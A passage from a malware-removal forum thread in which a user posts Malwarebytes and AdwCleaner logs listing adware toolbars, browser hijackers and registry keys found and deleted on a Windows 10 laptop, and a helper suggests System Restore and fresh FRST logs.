PUP.Optional.MixiDJToolbar, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{31E3431B-8F34-49CD-AE3D-992295E853A7}, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{31E3431B-8F34-49CD-AE3D-992295E853A7}, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{31E3431B-8F34-49CD-AE3D-992295E853A7}, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\MixiDJ_V46 Toolbar, , [8a30077eabee270f0eb1d4227a88659b],

Registry Values: 22
PUP.Optional.NetRadio, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|NetRadio.exe, 11001, , [a4161d688514f343f06255242fd51be5]
PUP.Optional.NetRadio, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|NetRadio.vshost.exe, 11001, , [3b7f7f06d2c772c4ef645821798bab55]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\chrome.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604419182722177, , [8d2d1a6bf3a667cfbe99270117ed8b75]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\explorer.xxx|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604419182722177, , [8c2edfa6c8d1b4824710aa7e9b693cc4]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\firefox.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604419182722177, , [eecc03820e8bc17530275ccc030142be]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\iexplore.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604419182722177, , [bffb265ff4a568ce1f38e543e61ec838]
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32Ldr  |{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604419182722177, , [6a50bfc67920df57b3a582a619ebc63a]
PUP.Optional.FastFreeConverter, HKLM\SOFTWARE\WOW6432NODE\FAST FREE CONVERTER|ffplugin_install, 1, , [d2e81b6a9bfea4923c4af60b4eb67f81]
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\CCIFDKGNONHKCMAOAPPJPMIJDHLPPGMG|path, C:\Users\Lexi\AppData\Local\CRE\ccifdkgnonhkcmaoappjpmijdhlppgmg.crx, , [2199f5906435d6601ba225f6679c50b0]
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{59C7FC09-1C83-4648-B3E6-003D2BBC7481}|AppPath, C:\Program Files (x86)\MyWebSearch\bar\1.bin, , [b2084b3a9801d75feabdcb4657ad47b9]
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{840E3B68-A458-41B7-8D2C-5E02A27F442E}|AppPath, C:\Users\Lexi\AppData\Local\Conduit\CT3298582, , [cfebcabb5643bb7b58ecfcfcc93a817f]
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{9170B96C-28D4-4626-8358-27E6CAEEF907}|AppPath, C:\Program Files (x86)\MyWebSearch\bar\1.bin, , [4e6ce79ee6b385b14166ec2525df6799]
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{D1A71FA0-FF48-48dd-9B6D-7A13A3E42127}|AppPath, C:\Program Files (x86)\MyWebSearch\bar\1.bin, , [c7f3770ef0a9bf77a30428e948bc1be5]
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{DDB1968E-EAD6-40fd-8DAE-FF14757F60C7}|AppPath, C:\Program Files (x86)\MyWebSearch\bar\1.bin, , [ba0035506d2ca98db8efdd3447bd8f71]
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{F138D901-86F0-4383-99B6-9CDD406036DA}|AppPath, C:\Program Files (x86)\MyWebSearch\bar\1.bin, , [f3c7a8dd752444f2584f1ff2b252b947]
PUP.Optional.NetRadio, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|NetRadio.vshost.exe, 11001, , [a416790cd7c2b18592c150294fb5fa06]
PUP.Optional.NetRadio, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|NetRadio.exe, 11001, , [9228ed98c3d6b185afa3225736ce4ab6]
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\SPPDCOM|TS, 2, , [7f3b86ff2c6dcb6bf13e3b30b450837d]
Trojan.Agent.Trace, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE|24d1ca9a-a864-4f7b-86fe-495eb56529d8, , [9d1d86ffb5e4a195d264073fed174bb5],
Trojan.Agent.Trace, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE|7bde84a2-f58f-46ec-9eac-f1f90fead080, , [8337d5b0e9b01422ce694600966e36ca],
PUP.Optional.ConduitTB.Gen, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\ccifdkgnonhkcmaoappjpmijdhlppgmg|path, C:\Users\Lexi\AppData\Local\CRE\ccifdkgnonhkcmaoappjpmijdhlppgmg.crx, , [8b2f473ee0b965d1932b74a78b78936d]
PUP.Optional.ProductSetup, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\PRODUCTSETUP|tb, 0T1J1E1B1J0S0S0X0K2W1D1M, , [edcd8ff657423bfbc8ffa9703ec6b44c]

Registry Data: 0
(No malicious items detected)

Folders: 19
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\Extensions, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\Extensions\FastFreeConverter, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\FastFreeConverter, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.MixiDJToolbar, C:\Program Files (x86)\MixiDJ_V46, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\AddedAppDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\DetectedAppDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\EngineFirstTimeDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\NewSearchProtectorDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\SearchProtectorBubbleDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\SearchProtectorDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\SearchProtectorRetakeoverDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\ToolbarFirstTimeDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\ToolbarUntrustedAppsApprovalDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\UntrustedAddedAppDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\UntrustedAppApprovalDialog, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\UntrustedAppPendingDialog, , [506aaadb584185b1eed311e5da28c23e],

Files: 46
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\FastFreeConverter.dll, , [5e5cbacbafea11259c32bc0bd2300cf4],
PUP.Optional.ConduitTB.Gen, C:\Program Files (x86)\MixiDJ_V46\tbMixi.dll, , [6a500c79871242f47ddded3e55b0ef11],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\install.ico, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\FastFreeConverterUpdt.exe, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\uninstall.exe, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\Extensions\FastFreeConverter\content_script.js, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\uninstall_plugin.exe, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.SearchProtect.AppFlsh, C:\Windows\AppPatch\Custom\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, , [6a5024615049aa8c2aed89e211f3a45c],
PUP.Optional.SearchProtect.AppFlsh, C:\Windows\AppPatch\Custom\Custom64\{cf2797aa-b7ec-e311-8ed9-005056c00008}.sdb, , [ba005e272871082e2cecbead4aba35cb],
PUP.Optional.MixiDJToolbar, C:\Program Files (x86)\MixiDJ_V46\hk64tbMixi.dll, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, C:\Program Files (x86)\MixiDJ_V46\hktbMixi.dll, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, C:\Program Files (x86)\MixiDJ_V46\ldrtbMixi.dll, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, C:\Program Files (x86)\MixiDJ_V46\prxtbMixi.dll, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, C:\Program Files (x86)\MixiDJ_V46\toolbar.cfg, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, C:\Program Files (x86)\MixiDJ_V46\uninstall.exe, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\hk64tbMix0.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\hk64tbMix2.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\hk64tbMixi.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\hktbMix0.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\hktbMix2.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\hktbMixi.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\ldrtbMix0.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\ldrtbMix2.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\ldrtbMixi.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\tbMix0.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\tbMix1.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\tbMix2.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\tbMixi.dll, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\toolbar.cfg, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\DialogsAPI.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\excanvas.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\PIE.htc, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\settings.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\AddedAppDialog\app-added.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\DetectedAppDialog\app-2go.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\EngineFirstTimeDialog\EngineFirstTimeDialog.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\NewSearchProtectorDialog\SearchProtector.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\SearchProtectorBubbleDialog\bubble.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\SearchProtectorDialog\SearchProtector.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\SearchProtectorRetakeoverDialog\SearchProtectorRetakeover.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\ToolbarFirstTimeDialog\ToolbarFirstTimeDialog.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\ToolbarUntrustedAppsApprovalDialog\ToolbarUntrustedAppsApprovalDialog.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\UntrustedAddedAppDialog\UT-app-dialog-added.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\UntrustedAppApprovalDialog\UT-app-dialog-needs-your-approval.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.MixiDJToolbar, C:\Users\Lexi\AppData\LocalLow\MixiDJ_V46\Dialogs\UntrustedAppPendingDialog\UT-app-dialog-is-waiting.js, , [506aaadb584185b1eed311e5da28c23e],
PUP.Optional.WinYahoo, C:\Users\Lexi\AppData\Roaming\Mozilla\Firefox\Profiles\iwi8s34o.default\prefs.js, Good: (user_pref("browser.startup.homepage", ""https://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy), ,[f4c6d1b41881ef47a5afac91e61fb14f]

Physical Sectors: 0
(No malicious items detected)


(end)

Link to post
Share on other sites

There are no entries in that log which would have a detrimental effect on your system such as you mention. Lets start over, use System Restore again, when your system is back to normal do not run Malwarebytes, run FRST and post two fresh logs, FRST.txt and Addition.txt. lets see what gives....

 

If you look back at the fix done previously with FRST and Malwarebytes your system was awash with malicious entries, pups, browser hijackers, infection and exploits.....  You maybe far better off formatting your hard drive and reinstalling windows...

Link to post
Share on other sites

If it is all the same to you, I would prefer NOT to go through the full restore again.  I would like to finish your former directions and see where it leads and then perhaps try the recovery tool.  I do not believe the result from restoring it a 3rd time would be any different.  This is an older laptop that is newly updated to Windows 10 from vista so it is possible that windows 10 is not stable for some reason (my main pc is in the shop due to a touch screen issue).  I would like to procede with the other steps you listed to remove items from my computer.  I did attempt to do a full uninstall of malwarebytes, but it did not restore the start menu.

My adwcleaner log is here:

 

 

 

  # AdwCleaner v5.101 - Logfile created 09/03/2016 at 16:34:24
# Updated 07/03/2016 by Xplode
# Database : 2016-03-08.1 [server]
# Operating system : Windows 10 Home  (x64)
# Username : Lexi - DURABLE
# Running from : C:\Users\Lexi\Downloads\AdwCleaner.exe
# Option : Clean
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

[-] Folder Deleted : C:\Program Files (x86)\Coupons
[-] Folder Deleted : C:\Program Files (x86)\File Type Helper
[-] Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
[-] Folder Deleted : C:\Users\Lexi\AppData\Roaming\pccustubinstaller
[-] Folder Deleted : C:\WINDOWS\SysWOW64\C2MP

***** [ Files ] *****


***** [ DLLs ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****

[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3C471948-F874-49F5-B338-4F214A2EE0B1}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9AFB8248-617F-460D-9366-D71CDEDA3179}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{DB507187-9746-458C-97DA-C458131EEDE7}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{07B18EAB-A523-4961-B6BB-170DE4475CCA}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3DC201FB-E9C9-499C-A11F-23C360D7C3F8}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{08858AF6-42AD-4914-95D2-AC3AB0DC8E28}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{68AF847F-6E91-45DD-9B68-D6A12C30E5D7}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{01947140-417F-46B6-8751-A3A2B8345E1A}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{07B18EAA-A523-4961-B6BB-170DE4475CCA}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{07B18EAC-A523-4961-B6BB-170DE4475CCA}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{1093995A-BA37-41D2-836E-091067C4AD17}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{120927BF-1700-43BC-810F-FAB92549B390}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{17DE5E5E-BFE3-4E83-8E1F-8755795359EC}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{1F52A5FA-A705-4415-B975-88503B291728}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{247A115F-06C2-4FB3-967D-2D62D3CF4F0A}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{2E3537FC-CF2F-4F56-AF54-5A6A3DD375CC}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{2E9937FC-CF2F-4F56-AF54-5A6A3DD375CC}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3E1656ED-F60E-4597-B6AA-B6A58E171495}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3E53E2CB-86DB-4A4A-8BD9-FFEB7A64DF82}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3E720451-B472-4954-B7AA-33069EB53906}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3E720453-B472-4954-B7AA-33069EB53906}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{63D0ED2B-B45B-4458-8B3B-60C69BBBD83C}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{63D0ED2D-B45B-4458-8B3B-60C69BBBD83C}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{6E74766C-4D93-4CC0-96D1-47B8E07FF9CA}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{72EE7F04-15BD-4845-A005-D6711144D86A}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{741DE825-A6F0-4497-9AA6-8023CF9B0FFF}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{7473D291-B7BB-4F24-AE82-7E2CE94BB6A9}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{7473D293-B7BB-4F24-AE82-7E2CE94BB6A9}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{7473D295-B7BB-4F24-AE82-7E2CE94BB6A9}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{7473D297-B7BB-4F24-AE82-7E2CE94BB6A9}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{819FFE21-35C7-4925-8CDA-4E0E2DB94302}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{8E9CF769-3D3B-40EB-9E2D-76E7A205E4D2}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{90449521-D834-4703-BB4E-D3AA44042FF8}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{991AAC62-B100-47CE-8B75-253965244F69}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{A626CDBD-3D13-4F78-B819-440A28D7E8FC}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{BBABDC90-F3D5-4801-863A-EE6AE529862D}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{CF54BE1C-9359-4395-8533-1657CF209CFE}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{D6FF3684-AD3B-48EB-BBB4-B9E6C5A355C1}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{DB507187-9746-458C-97DA-C458131EEDE7}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{DE38C398-B328-4F4C-A3AD-1B5E4ED93477}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E342AF55-B78A-4CD0-A2BB-DA7F52D9D25E}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E342AF55-B78A-4CD0-A2BB-DA7F52D9D25F}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E79DFBC9-5697-4FBD-94E5-5B2A9C7C1612}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E79DFBCB-5697-4FBD-94E5-5B2A9C7C1612}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EB9E5C1C-B1F9-4C2B-BE8A-27D6446FDAF8}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{F87D7FB5-9DC5-4C8C-B998-D8DFE02E2978}
[-] Key Deleted : HKCU\Software\APN PIP
[-] Key Deleted : HKCU\Software\BackgroundContainer
[-] Key Deleted : HKCU\Software\FunWebProducts
[-] Key Deleted : HKCU\Software\MyWebSearch
[-] Key Deleted : HKCU\Software\Zugo
[-] Key Deleted : HKCU\Software\AppDataLow\Toolbar
[-] Key Deleted : HKCU\Software\AppDataLow\Software\BackgroundContainer
[-] Key Deleted : HKCU\Software\AppDataLow\Software\MyWebSearch
[-] Key Deleted : HKLM\SOFTWARE\FocusInteractive
[-] Key Deleted : HKLM\SOFTWARE\Fun Web Products
[-] Key Deleted : HKLM\SOFTWARE\MyWebSearch
[-] Key Deleted : HKLM\SOFTWARE\PIP
[-] Key Deleted : HKLM\SOFTWARE\W3I
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{739126B3-1B80-4F9F-8D59-312A19633E1A}_is1
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD95D125-2992-4858-B3EF-5F6FB52FBAD6}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4
[-] Key Deleted : HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4
[#] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\conduit.com

***** [ Web browsers ] *****

[-] [C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : search.mywebsearch.com
[-] [C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : websearch.ask.com
[-] [C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : ask.com__
[-] [C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : search.conduit.com
[-] [C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : wayfair.com
[-] [C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : ask.com
[-] [C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web Data] [search Provider] Deleted : aol.com

*************************

:: "Tracing" keys removed
:: Winsock settings cleared

*************************

C:\Program Files (x86)\AdwCleaner\AdwCleaner[C1].txt - [7947 bytes] - [09/03/2016 16:34:24]
C:\Program Files (x86)\AdwCleaner\AdwCleaner[s1].txt - [15225 bytes] - [08/03/2016 09:47:39]

